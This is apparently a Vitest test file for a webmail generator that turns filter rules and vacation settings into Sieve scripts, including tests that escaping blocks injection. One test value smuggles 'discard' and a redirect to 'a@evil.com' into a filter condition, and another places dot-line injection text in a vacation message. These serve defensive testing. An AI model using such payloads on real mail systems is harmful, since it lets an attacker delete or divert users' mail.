import { describe, expect, it } from "vitest";
import type { FilterRule, VacationSettings } from "@webmail/shared";
import { generateSieveScript } from "./generator";

function rule(overrides: Partial<FilterRule>): FilterRule {
  return {
    id: "r1",
    position: 0,
    name: "test rule",
    matchType: "all",
    conditions: [{ field: "from", op: "contains", value: "a@b.com" }],
    actions: [{ type: "fileinto", folder: "Archive" }],
    enabled: true,
    ...overrides,
  };
}

function vacation(overrides: Partial<VacationSettings>): VacationSettings {
  return {
    enabled: true,
    subject: "",
    message: "I am away",
    startsAt: null,
    endsAt: null,
    intervalDays: 7,
    ...overrides,
  };
}

const base = { vacation: null, trashFolder: "Trash" };

describe("generateSieveScript", () => {
  it("returns empty string with no rules and no vacation", () => {
    expect(generateSieveScript({ rules: [], ...base })).toBe("");
  });

  it("generates a complete simple script exactly", () => {
    const script = generateSieveScript({
      rules: [
        rule({
          name: "invoices",
          conditions: [{ field: "from", op: "contains", value: "billing@acme.com" }],
          actions: [{ type: "fileinto", folder: "Invoices" }],
        }),
      ],
      ...base,
    });
    expect(script).toBe(
      "# Generated by webmail. Do not edit manually.\n\n" +
        'require ["fileinto"];\n\n' +
        "# rule: invoices\n" +
        'if header :contains "from" "billing@acme.com" {\n' +
        '  fileinto "Invoices";\n' +
        "}\n",
    );
  });

  it("maps every condition field and op", () => {
    const script = generateSieveScript({
      rules: [
        rule({
          matchType: "any",
          conditions: [
            { field: "from", op: "is", value: "boss@acme.com" },
            { field: "to", op: "contains", value: "team@" },
            { field: "subject", op: "contains", value: "urgent" },
            { field: "body", op: "contains", value: "invoice" },
          ],
        }),
      ],
      ...base,
    });
    expect(script).toContain(
      'anyof (header :is "from" "boss@acme.com", ' +
        'header :contains ["to", "cc"] "team@", ' +
        'header :contains "subject" "urgent", ' +
        'body :text :contains "invoice")',
    );
    expect(script).toContain('require ["body", "fileinto"];');
  });

  it("maps every action type", () => {
    const script = generateSieveScript({
      rules: [
        rule({
          actions: [
            { type: "seen" },
            { type: "flag", keyword: "Important" },
            { type: "delete" },
            { type: "stop" },
          ],
        }),
      ],
      trashFolder: "Papelera",
      vacation: null,
    });
    expect(script).toContain('addflag "\\\\Seen";');
    expect(script).toContain('addflag "Important";');
    expect(script).toContain('fileinto "Papelera";');
    expect(script).toContain("stop;");
    expect(script).toContain('require ["fileinto", "imap4flags"];');
    expect(script).not.toContain("redirect");
    expect(script).not.toContain("discard");
  });

  it("orders rules by position and skips disabled ones", () => {
    const script = generateSieveScript({
      rules: [
        rule({ id: "b", position: 2, name: "second" }),
        rule({ id: "c", position: 1, name: "disabled", enabled: false }),
        rule({ id: "a", position: 0, name: "first" }),
      ],
      ...base,
    });
    expect(script.indexOf("# rule: first")).toBeGreaterThan(-1);
    expect(script.indexOf("# rule: first")).toBeLessThan(script.indexOf("# rule: second"));
    expect(script).not.toContain("disabled");
  });

  it("escapes quotes and backslashes in user values (injection attack)", () => {
    const script = generateSieveScript({
      rules: [
        rule({
          conditions: [
            {
              field: "from",
              op: "contains",
              value: 'x"; discard; if true { redirect "a@evil.com" }',
            },
          ],
        }),
      ],
      ...base,
    });
    expect(script).toContain(
      'header :contains "from" "x\\"; discard; if true { redirect \\"a@evil.com\\" }"',
    );
    // the injected text stays inside ONE quoted string: no statement boundary escaped
    expect(script).not.toMatch(/^\s*discard/m);
    expect(script).not.toMatch(/^\s*redirect/m);
  });

  it("escapes backslashes before quotes", () => {
    const script = generateSieveScript({
      rules: [rule({ conditions: [{ field: "subject", op: "is", value: 'a\\"b' }] })],
      ...base,
    });
    expect(script).toContain(String.raw`"a\\\"b"`);
  });

  it("replaces control characters in single-line values", () => {
    const script = generateSieveScript({
      rules: [
        rule({
          name: "evil\nname",
          conditions: [{ field: "subject", op: "contains", value: "a\nstop;" }],
        }),
      ],
      ...base,
    });
    expect(script).toContain("# rule: evil name");
    expect(script).toContain('"a stop;"');
  });

  it("generates vacation with defaults", () => {
    const script = generateSieveScript({
      rules: [],
      vacation: vacation({}),
      trashFolder: "Trash",
    });
    expect(script).toContain('require ["vacation"];');
    expect(script).toContain("vacation :days 7 text:\r\nI am away\r\n.\r\n;");
  });

  it("generates vacation with subject and date range", () => {
    const script = generateSieveScript({
      rules: [],
      vacation: vacation({
        subject: "Out of office",
        startsAt: "2026-07-10",
        endsAt: "2026-07-20",
        intervalDays: 3,
      }),
      trashFolder: "Trash",
    });
    expect(script).toContain('require ["date", "relational", "vacation"];');
    expect(script).toContain(
      'if allof (currentdate :value "ge" "date" "2026-07-10", currentdate :value "le" "date" "2026-07-20") {',
    );
    expect(script).toContain(':days 3 :subject "Out of office" text:');
  });

  it("dot-stuffs vacation message lines (text: block injection attack)", () => {
    const script = generateSieveScript({
      rules: [],
      vacation: vacation({ message: "Away.\n.\n..danger" }),
      trashFolder: "Trash",
    });
    expect(script).toContain("text:\r\nAway.\r\n..\r\n...danger\r\n.\r\n;");
  });

  it("skips vacation when disabled or message blank", () => {
    expect(
      generateSieveScript({ rules: [], vacation: vacation({ enabled: false }), trashFolder: "Trash" }),
    ).toBe("");
    expect(
      generateSieveScript({ rules: [], vacation: vacation({ message: "  " }), trashFolder: "Trash" }),
    ).toBe("");
  });

  it("puts vacation after all filter rules", () => {
    const script = generateSieveScript({
      rules: [rule({})],
      vacation: vacation({}),
      trashFolder: "Trash",
    });
    expect(script.indexOf("if header")).toBeLessThan(script.indexOf("vacation :days"));
  });
});
